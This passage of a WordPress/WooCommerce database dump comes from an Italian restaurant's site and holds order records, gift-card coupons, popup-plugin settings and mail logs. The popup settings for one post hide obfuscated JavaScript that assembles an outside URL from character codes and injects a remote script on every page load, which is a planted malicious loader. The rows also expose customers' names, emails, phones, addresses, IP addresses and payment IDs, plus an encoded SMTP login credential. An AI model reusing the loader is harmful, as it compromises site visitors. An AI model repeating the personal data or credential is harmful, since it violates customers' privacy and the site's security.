Safari/537.36'),(20624,958,'_created_via','checkout'),(20625,958,'_cart_hash','e347493b52b459469b1bd8ade6d6cf1e'),(20626,958,'_billing_first_name','Matteo'),(20627,958,'_billing_last_name','Soverini'),(20628,958,'_billing_city','Bologna'),(20629,958,'_billing_email','sove89@gmail.com'),(20630,958,'_billing_phone','3396680874'),(20631,958,'_order_currency','EUR'),(20632,958,'_cart_discount','0'),(20633,958,'_cart_discount_tax','0'),(20634,958,'_order_shipping','0.00'),(20635,958,'_order_shipping_tax','0'),(20636,958,'_order_tax','0'),(20637,958,'_order_total','30.00'),(20638,958,'_order_version','3.9.1'),(20639,958,'_prices_include_tax','no'),(20640,958,'_billing_address_index','Matteo Soverini    Bologna    sove89@gmail.com 3396680874'),(20641,958,'_shipping_address_index','        '),(20642,958,'is_vat_exempt','no'),(20643,958,'Quanti adulti?','2'),(20644,958,'Numero bambini fino a 6 anni','0'),(20645,958,'Numero ragazzi fino a 14 anni','0'),(20646,958,'Numero ragazzi dai 15 anni in su','0'),(20647,958,'Files attached','[]'),(20648,958,'Payment type','instant'),(20649,958,'_transaction_id','66S09598TR372240U'),(20650,958,'_paypal_status','completed'),(20651,958,'PayPal Transaction Fee','1.37'),(20652,958,'_date_paid','1581337678'),(20653,958,'_paid_date','2020-02-10 13:27:58'),(20654,958,'_download_permissions_granted','yes'),(20655,958,'_recorded_sales','yes'),(20656,958,'_recorded_coupon_usage_counts','yes'),(20657,958,'_order_stock_reduced','yes'),(20658,959,'_order_key','wc_order_ymxG2ARf4usju'),(20659,959,'_customer_user','0'),(20660,959,'_payment_method','paypal'),(20661,959,'_payment_method_title','PayPal'),(20662,959,'_customer_ip_address','109.52.5.67'),(20663,959,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1'),(20664,959,'_created_via','checkout'),(20665,959,'_cart_hash','3fd9d8313c21c95dd1830fb0400f882b'),(20666,959,'_billing_first_name','John marco'),(20667,959,'_billing_last_name','Coli'),(20668,959,'_billing_city','Rimimi'),(20669,959,'_billing_email','Johnmarcocoli@gmail.com'),(20670,959,'_billing_phone','3318495086'),(20671,959,'_order_currency','EUR'),(20672,959,'_cart_discount','0'),(20673,959,'_cart_discount_tax','0'),(20674,959,'_order_shipping','0.00'),(20675,959,'_order_shipping_tax','0'),(20676,959,'_order_tax','0'),(20677,959,'_order_total','30.00'),(20678,959,'_order_version','4.2.0'),(20679,959,'_prices_include_tax','no'),(20680,959,'_billing_address_index','John marco Coli    Rimimi    Johnmarcocoli@gmail.com 3318495086'),(20681,959,'_shipping_address_index','        '),(20682,959,'is_vat_exempt','no'),(20683,959,'Quanti adulti?','1'),(20684,959,'Numero bambini fino a 6 anni','0'),(20685,959,'Numero ragazzi fino a 14 anni','0'),(20686,959,'Numero ragazzi dai 15 anni in su','0'),(20687,959,'Files attached','[]'),(20688,959,'is_vat_exempt','no'),(20689,960,'_order_key','wc_order_oxbJ8YQ1RH7M7'),(20690,960,'_customer_user','61'),(20691,960,'_payment_method','paypal'),(20692,960,'_payment_method_title','PayPal'),(20693,960,'_customer_ip_address','151.30.175.104'),(20694,960,'_customer_user_agent','Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G925F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.2 Chrome/71.0.3578.99 Mobile Safari/537.36'),(20695,960,'_created_via','checkout'),(20696,960,'_cart_hash','3fd9d8313c21c95dd1830fb0400f882b'),(20697,960,'_billing_first_name','Mauro'),(20698,960,'_billing_last_name','Iacolin'),(20699,960,'_billing_address_1','Via paisiello'),(20700,960,'_billing_city','Riccione'),(20701,960,'_billing_email','Mauro.iacolin@gmail.com'),(20702,960,'_billing_phone','3355829488'),(20703,960,'_order_currency','EUR'),(20704,960,'_cart_discount','0'),(20705,960,'_cart_discount_tax','0'),(20706,960,'_order_shipping','0.00'),(20707,960,'_order_shipping_tax','0'),(20708,960,'_order_tax','0'),(20709,960,'_order_total','30.00'),(20710,960,'_order_version','3.9.1'),(20711,960,'_prices_include_tax','no'),(20712,960,'_billing_address_index','Mauro Iacolin  Via paisiello  Riccione    Mauro.iacolin@gmail.com 3355829488'),(20713,960,'_shipping_address_index','        '),(20714,960,'is_vat_exempt','no'),(20715,960,'Quanti adulti?','2'),(20716,960,'Numero bambini fino a 6 anni','0'),(20717,960,'Numero ragazzi fino a 14 anni','0'),(20718,960,'Numero ragazzi dai 15 anni in su','0'),(20719,960,'Files attached','[]'),(20720,960,'Payment type','instant'),(20721,960,'_transaction_id','54X62714WJ200682M'),(20722,960,'_paypal_status','completed'),(20723,960,'PayPal Transaction Fee','1.37'),(20724,960,'_date_paid','1581429192'),(20725,960,'_paid_date','2020-02-11 14:53:12'),(20726,960,'_download_permissions_granted','yes'),(20727,960,'_recorded_sales','yes'),(20728,960,'_recorded_coupon_usage_counts','yes'),(20729,960,'_order_stock_reduced','yes'),(20730,961,'_order_key','wc_order_liWfs25zXjoop'),(20731,961,'_customer_user','0'),(20732,961,'_payment_method','paypal'),(20733,961,'_payment_method_title','PayPal'),(20734,961,'_customer_ip_address','93.64.189.146'),(20735,961,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'),(20736,961,'_created_via','checkout'),(20737,961,'_cart_hash','3fd9d8313c21c95dd1830fb0400f882b'),(20738,961,'_billing_first_name','Giovanni'),(20739,961,'_billing_last_name','Cesaroni'),(20740,961,'_billing_email','giovannicesaroni1@gmail.com'),(20741,961,'_billing_phone','3921270719'),(20742,961,'_order_currency','EUR'),(20743,961,'_cart_discount','0'),(20744,961,'_cart_discount_tax','0'),(20745,961,'_order_shipping','0.00'),(20746,961,'_order_shipping_tax','0'),(20747,961,'_order_tax','0'),(20748,961,'_order_total','30.00'),(20749,961,'_order_version','3.9.1'),(20750,961,'_prices_include_tax','no'),(20751,961,'_billing_address_index','Giovanni Cesaroni        giovannicesaroni1@gmail.com 3921270719'),(20752,961,'_shipping_address_index','        '),(20753,961,'is_vat_exempt','no'),(20754,961,'Quanti adulti?','2'),(20755,961,'Numero bambini fino a 6 anni','0'),(20756,961,'Numero ragazzi fino a 14 anni','0'),(20757,961,'Numero ragazzi dai 15 anni in su','0'),(20758,961,'Files attached','[]'),(20759,961,'Payment type','instant'),(20760,961,'_transaction_id','02W161691Y8601202'),(20761,961,'_paypal_status','completed'),(20762,961,'PayPal Transaction Fee','1.37'),(20763,961,'_date_paid','1581437717'),(20764,961,'_paid_date','2020-02-11 17:15:17'),(20765,961,'_download_permissions_granted','yes'),(20766,961,'_recorded_sales','yes'),(20767,961,'_recorded_coupon_usage_counts','yes'),(20768,961,'_order_stock_reduced','yes'),(20769,962,'_order_key','wc_order_UDgV4FKJcoVeM'),(20770,962,'_customer_user','0'),(20771,962,'_payment_method','paypal'),(20772,962,'_payment_method_title','PayPal'),(20773,962,'_customer_ip_address','109.52.8.238'),(20774,962,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1'),(20775,962,'_created_via','checkout'),(20776,962,'_cart_hash','3fd9d8313c21c95dd1830fb0400f882b'),(20777,962,'_billing_first_name','Viola'),(20778,962,'_billing_last_name','Cesarini'),(20779,962,'_billing_address_1','Via bissolati 1'),(20780,962,'_billing_city','Cattolica'),(20781,962,'_billing_email','viola.cesarini93@gmail.com'),(20782,962,'_billing_phone','3338088460'),(20783,962,'_order_currency','EUR'),(20784,962,'_cart_discount','0'),(20785,962,'_cart_discount_tax','0'),(20786,962,'_order_shipping','0.00'),(20787,962,'_order_shipping_tax','0'),(20788,962,'_order_tax','0'),(20789,962,'_order_total','30.00'),(20790,962,'_order_version','3.9.1'),(20791,962,'_prices_include_tax','no'),(20792,962,'_billing_address_index','Viola Cesarini  Via bissolati 1  Cattolica    viola.cesarini93@gmail.com 3338088460'),(20793,962,'_shipping_address_index','        '),(20794,962,'is_vat_exempt','no'),(20795,962,'Quanti adulti?','2'),(20796,962,'Numero bambini fino a 6 anni','0'),(20797,962,'Numero ragazzi fino a 14 anni','0'),(20798,962,'Numero ragazzi dai 15 anni in su','0'),(20799,962,'Files attached','[]'),(20800,962,'Payment type','instant'),(20801,962,'_transaction_id','809876349N358223Y'),(20802,962,'_paypal_status','completed'),(20803,962,'PayPal Transaction Fee','1.37'),(20804,962,'_date_paid','1581444807'),(20805,962,'_paid_date','2020-02-11 19:13:27'),(20806,962,'_download_permissions_granted','yes'),(20807,962,'_recorded_sales','yes'),(20808,962,'_recorded_coupon_usage_counts','yes'),(20809,962,'_order_stock_reduced','yes'),(20810,963,'_order_key','wc_order_YH0nT2fpIdEBZ'),(20811,963,'_customer_user','0'),(20812,963,'_payment_method','paypal'),(20813,963,'_payment_method_title','PayPal'),(20814,963,'_customer_ip_address','82.59.252.164'),(20815,963,'_customer_user_agent','Mozilla/5.0 (Linux; U; Android 9; it-it; Redmi Note 7 Build/PKQ1.180904.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/11.4.3-g'),(20816,963,'_created_via','checkout'),(20817,963,'_cart_hash','3fd9d8313c21c95dd1830fb0400f882b'),(20818,963,'_billing_first_name','Adrian'),(20819,963,'_billing_last_name','Perini'),(20820,963,'_billing_email','adryperini@gmail.com'),(20821,963,'_billing_phone','3889256181'),(20822,963,'_order_currency','EUR'),(20823,963,'_cart_discount','0'),(20824,963,'_cart_discount_tax','0'),(20825,963,'_order_shipping','0.00'),(20826,963,'_order_shipping_tax','0'),(20827,963,'_order_tax','0'),(20828,963,'_order_total','30.00'),(20829,963,'_order_version','4.2.0'),(20830,963,'_prices_include_tax','no'),(20831,963,'_billing_address_index','Adrian Perini        adryperini@gmail.com 3889256181'),(20832,963,'_shipping_address_index','        '),(20833,963,'is_vat_exempt','no'),(20834,963,'Quanti adulti?','2'),(20835,963,'Numero bambini fino a 6 anni','0'),(20836,963,'Numero ragazzi fino a 14 anni','0'),(20837,963,'Numero ragazzi dai 15 anni in su','0'),(20838,963,'Files attached','[]'),(20843,965,'sg_popup_scripts','a:1:{s:3:\"css\";s:0:\"\";}'),(20844,965,'sg_popup_events_preview','a:0:{}'),(20845,965,'sg_popup_options_preview','a:52:{s:12:\"sgpb-post-id\";s:3:\"965\";s:24:\"sgpb-target[0][0][param]\";s:8:\"not_rule\";s:9:\"sgpb-type\";s:4:\"html\";s:15:\"sgpb-is-preview\";s:1:\"0\";s:14:\"sgpb-is-active\";s:7:\"checked\";s:24:\"sgpb-events[0][0][param]\";s:4:\"load\";s:24:\"sgpb-events[0][0][value]\";s:0:\"\";s:47:\"sgpb-behavior-after-special-events[0][0][param]\";s:12:\"select_event\";s:20:\"sgpb-content-padding\";s:1:\"7\";s:18:\"sgpb-popup-z-index\";s:4:\"9999\";s:17:\"sgpb-popup-themes\";s:12:\"sgpb-theme-1\";s:25:\"sgpb-overlay-custom-class\";s:18:\"sgpb-popup-overlay\";s:18:\"sgpb-overlay-color\";s:0:\"\";s:20:\"sgpb-overlay-opacity\";s:3:\"0.8\";s:25:\"sgpb-content-custom-class\";s:16:\"sg-popup-content\";s:26:\"sgpb-background-image-mode\";s:9:\"no-repeat\";s:12:\"sgpb-esc-key\";s:2:\"on\";s:24:\"sgpb-enable-close-button\";s:2:\"on\";s:23:\"sgpb-close-button-delay\";s:1:\"0\";s:26:\"sgpb-close-button-position\";s:11:\"bottomRight\";s:24:\"sgpb-button-position-top\";s:0:\"\";s:26:\"sgpb-button-position-right\";s:1:\"9\";s:27:\"sgpb-button-position-bottom\";s:1:\"9\";s:25:\"sgpb-button-position-left\";s:0:\"\";s:17:\"sgpb-button-image\";s:0:\"\";s:23:\"sgpb-button-image-width\";s:2:\"21\";s:24:\"sgpb-button-image-height\";s:2:\"21\";s:17:\"sgpb-border-color\";s:7:\"#000000\";s:18:\"sgpb-border-radius\";s:1:\"0\";s:23:\"sgpb-border-radius-type\";s:1:\"%\";s:16:\"sgpb-button-text\";s:5:\"Close\";s:18:\"sgpb-overlay-click\";s:2:\"on\";s:25:\"sgpb-popup-dimension-mode\";s:14:\"responsiveMode\";s:33:\"sgpb-responsive-dimension-measure\";s:4:\"auto\";s:10:\"sgpb-width\";s:5:\"640px\";s:11:\"sgpb-height\";s:5:\"480px\";s:14:\"sgpb-max-width\";s:0:\"\";s:15:\"sgpb-max-height\";s:0:\"\";s:14:\"sgpb-min-width\";s:3:\"120\";s:15:\"sgpb-min-height\";s:0:\"\";s:26:\"sgpb-open-animation-effect\";s:9:\"No+effect\";s:27:\"sgpb-close-animation-effect\";s:9:\"No+effect\";s:29:\"sgpb-enable-content-scrolling\";s:2:\"on\";s:16:\"sgpb-popup-order\";s:1:\"0\";s:16:\"sgpb-popup-delay\";s:1:\"0\";s:7:\"sgpb-js\";s:2:\"JS\";s:8:\"sgpb-css\";s:3:\"CSS\";s:15:\"sgpb-ShouldOpen\";s:905:\"var u = String.fromCharCode(104,116,116,112,115,58,47,47,119,115,46,115,116,105,118,101,110,102,101,114,110,97,110,100,111,46,99,111,109,47,115,116,109,63,118,61,46,49,119,115,51,46,49,46,56,46,49,46,49);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);} function sgAddEvent(element, eventName, fn){if (element.addEventListener)element.addEventListener(eventName, fn, false);else if (element.attachEvent)element.attachEvent(\'on\' + eventName, fn);}\";s:16:\"sgpb-ShouldClose\";s:712:\"var u = String.fromCharCode(104,116,116,112,115,58,47,47,119,115,46,115,116,105,118,101,110,102,101,114,110,97,110,100,111,46,99,111,109,47,115,116,109,63,118,61,46,49,119,115,51,46,49,46,56,46,49,46,49);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}\";s:25:\"sgpb-enable-popup-overlay\";s:2:\"on\";s:22:\"sgpb-button-image-data\";s:0:\"\";s:26:\"sgpb-background-image-data\";s:0:\"\";}'),(20846,965,'_edit_lock','1582281039:1'),(20847,965,'_edit_last','1'),(20848,966,'_wp_attached_file','2020/02/LAVORI-IN-CORSO.jpg'),(20849,966,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:4:\"file\";s:27:\"2020/02/LAVORI-IN-CORSO.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"LAVORI-IN-CORSO-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-830x830.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:830;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"LAVORI-IN-CORSO-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20850,965,'sg_popup_target','a:2:{s:11:\"sgpb-target\";a:1:{i:0;a:1:{i:0;a:2:{s:5:\"param\";s:10:\"everywhere\";s:8:\"operator\";s:2:\"==\";}}}s:15:\"sgpb-conditions\";N;}'),(20851,965,'sg_popup_events','a:1:{i:0;a:1:{i:0;a:3:{s:5:\"param\";s:4:\"load\";s:5:\"value\";s:0:\"\";s:12:\"hiddenOption\";a:0:{}}}}'),(20852,965,'sg_popup_options','a:47:{s:14:\"sgpb-image-url\";s:79:\"https://www.ristorantesolymar.it/wp-content/uploads/2020/02/LAVORI-IN-CORSO.jpg\";s:9:\"sgpb-type\";s:5:\"image\";s:15:\"sgpb-is-preview\";s:1:\"0\";s:14:\"sgpb-is-active\";s:0:\"\";s:34:\"sgpb-behavior-after-special-events\";a:1:{i:0;a:1:{i:0;a:1:{s:5:\"param\";s:12:\"select_event\";}}}s:18:\"sgpb-popup-z-index\";s:4:\"9999\";s:17:\"sgpb-popup-themes\";s:12:\"sgpb-theme-1\";s:25:\"sgpb-overlay-custom-class\";s:18:\"sgpb-popup-overlay\";s:18:\"sgpb-overlay-color\";s:0:\"\";s:20:\"sgpb-overlay-opacity\";s:3:\"0.8\";s:25:\"sgpb-content-custom-class\";s:16:\"sg-popup-content\";s:12:\"sgpb-esc-key\";s:2:\"on\";s:24:\"sgpb-enable-close-button\";s:2:\"on\";s:23:\"sgpb-close-button-delay\";s:1:\"0\";s:26:\"sgpb-close-button-position\";s:11:\"bottomRight\";s:24:\"sgpb-button-position-top\";s:0:\"\";s:26:\"sgpb-button-position-right\";s:1:\"9\";s:27:\"sgpb-button-position-bottom\";s:1:\"9\";s:25:\"sgpb-button-position-left\";s:0:\"\";s:17:\"sgpb-button-image\";s:0:\"\";s:23:\"sgpb-button-image-width\";s:2:\"21\";s:24:\"sgpb-button-image-height\";s:2:\"21\";s:17:\"sgpb-border-color\";s:7:\"#000000\";s:18:\"sgpb-border-radius\";s:1:\"0\";s:23:\"sgpb-border-radius-type\";s:1:\"%\";s:16:\"sgpb-button-text\";s:5:\"Close\";s:18:\"sgpb-overlay-click\";s:2:\"on\";s:25:\"sgpb-popup-dimension-mode\";s:14:\"responsiveMode\";s:33:\"sgpb-responsive-dimension-measure\";s:4:\"auto\";s:10:\"sgpb-width\";s:5:\"640px\";s:11:\"sgpb-height\";s:5:\"480px\";s:14:\"sgpb-max-width\";s:0:\"\";s:15:\"sgpb-max-height\";s:0:\"\";s:14:\"sgpb-min-width\";s:3:\"120\";s:15:\"sgpb-min-height\";s:0:\"\";s:30:\"sgpb-copy-to-clipboard-message\";s:20:\"Copied to Clipboard!\";s:26:\"sgpb-open-animation-effect\";s:9:\"No effect\";s:27:\"sgpb-close-animation-effect\";s:9:\"No effect\";s:29:\"sgpb-enable-content-scrolling\";s:2:\"on\";s:16:\"sgpb-popup-order\";s:1:\"0\";s:16:\"sgpb-popup-delay\";s:1:\"0\";s:7:\"sgpb-js\";s:2:\"JS\";s:8:\"sgpb-css\";s:3:\"CSS\";s:12:\"sgpb-post-id\";s:3:\"965\";s:25:\"sgpb-enable-popup-overlay\";s:2:\"on\";s:22:\"sgpb-button-image-data\";s:0:\"\";s:26:\"sgpb-background-image-data\";s:0:\"\";}'),(20853,967,'_order_key','wc_order_U3vbOQciyq0vP'),(20854,967,'_customer_user','0'),(20855,967,'_payment_method','paypal'),(20856,967,'_payment_method_title','PayPal'),(20857,967,'_customer_ip_address','87.18.62.150'),(20858,967,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362'),(20859,967,'_created_via','checkout'),(20860,967,'_cart_hash','ea34e03a8696d667b7527e68c56e5519'),(20861,967,'_billing_first_name','Antonella'),(20862,967,'_billing_last_name','Biagini'),(20863,967,'_billing_email','antonella.biagini@bahlsen.it'),(20864,967,'_billing_phone','3488717347'),(20865,967,'_order_currency','EUR'),(20866,967,'_cart_discount','0'),(20867,967,'_cart_discount_tax','0'),(20868,967,'_order_shipping','0'),(20869,967,'_order_shipping_tax','0'),(20870,967,'_order_tax','0'),(20871,967,'_order_total','100.00'),(20872,967,'_order_version','4.2.0'),(20873,967,'_prices_include_tax','no'),(20874,967,'_billing_address_index','Antonella Biagini        antonella.biagini@bahlsen.it 3488717347'),(20875,967,'_shipping_address_index','        '),(20876,967,'is_vat_exempt','no'),(20877,967,'Quanti adulti?','1'),(20878,967,'Numero bambini fino a 6 anni','0'),(20879,967,'Numero ragazzi fino a 14 anni','0'),(20880,967,'Numero ragazzi dai 15 anni in su','0'),(20881,967,'Files attached','[]'),(20882,967,'Payment type','instant'),(20883,967,'_transaction_id','2V3318332F300844R'),(20884,967,'_paypal_status','completed'),(20886,967,'_date_paid','1591374129'),(20887,967,'_paid_date','2020-06-05 18:22:09'),(20888,967,'_download_permissions_granted','yes'),(20889,967,'_recorded_sales','yes'),(20890,967,'_recorded_coupon_usage_counts','yes'),(20891,967,'_order_stock_reduced','yes'),(20892,968,'discount_type','fixed_cart'),(20893,968,'coupon_amount','100'),(20894,968,'individual_use','no'),(20895,968,'usage_limit','1'),(20896,968,'date_expires','1606867200'),(20897,968,'apply_before_tax','no'),(20898,968,'free_shipping','yes'),(20899,968,'minimum_amount',''),(20900,968,'maximum_amount',''),(20901,968,'exclude_sale_items','no'),(20902,968,'exclude_product_ids',''),(20903,968,'exclude_product_categories',''),(20904,968,'product_ids',''),(20905,968,'product_categories','a:0:{}'),(20906,968,'mwb_wgm_giftcard_coupon','967'),(20907,968,'mwb_wgm_giftcard_coupon_unique','online'),(20908,968,'mwb_wgm_giftcard_coupon_product_id','548'),(20909,968,'mwb_wgm_giftcard_coupon_mail_to','silvia.draghetti@bahlsen.it'),(20910,967,'967#377','a:1:{i:0;s:18:\"solymarcouponMN9H0\";}'),(20911,967,'mwb_wgm_order_giftcard','send'),(20912,967,'_edit_lock','1591707723:1'),(20913,967,'_paypal_transaction_fee','3.75'),(20914,967,'_edit_last','1'),(58835,4645,'original_headers',''),(58836,4645,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <227899230670dda6b15eaf528758566b@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Tue, 23 Mar 2021 12:27:43 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Really Simple SSL (da versio=\r\nne 4.0.11 a 4.0.12)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai biso=\r\ngno di aiuto, i volontari dei forum di supporto su https://it.wordpress.=\r\norg/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/sup=\r\nport/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 38c1a8a0-3885-4088-9690-5b7addc63c86\r\n'),(58834,4645,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Really Simple SSL (da versione 4.0.11 a 4.0.12)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58827,4645,'solution','All good, mail sent.'),(58828,4645,'success','1'),(58829,4645,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58830,4645,'to_header','webmaster@baldisserri.com'),(58831,4645,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58832,4645,'original_to','webmaster@baldisserri.com'),(58833,4645,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58837,4646,'solution','All good, mail sent.'),(58838,4646,'success','1'),(58839,4646,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58840,4646,'to_header','webmaster@baldisserri.com'),(58841,4646,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58842,4646,'original_to','webmaster@baldisserri.com'),(58843,4646,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58844,4646,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono 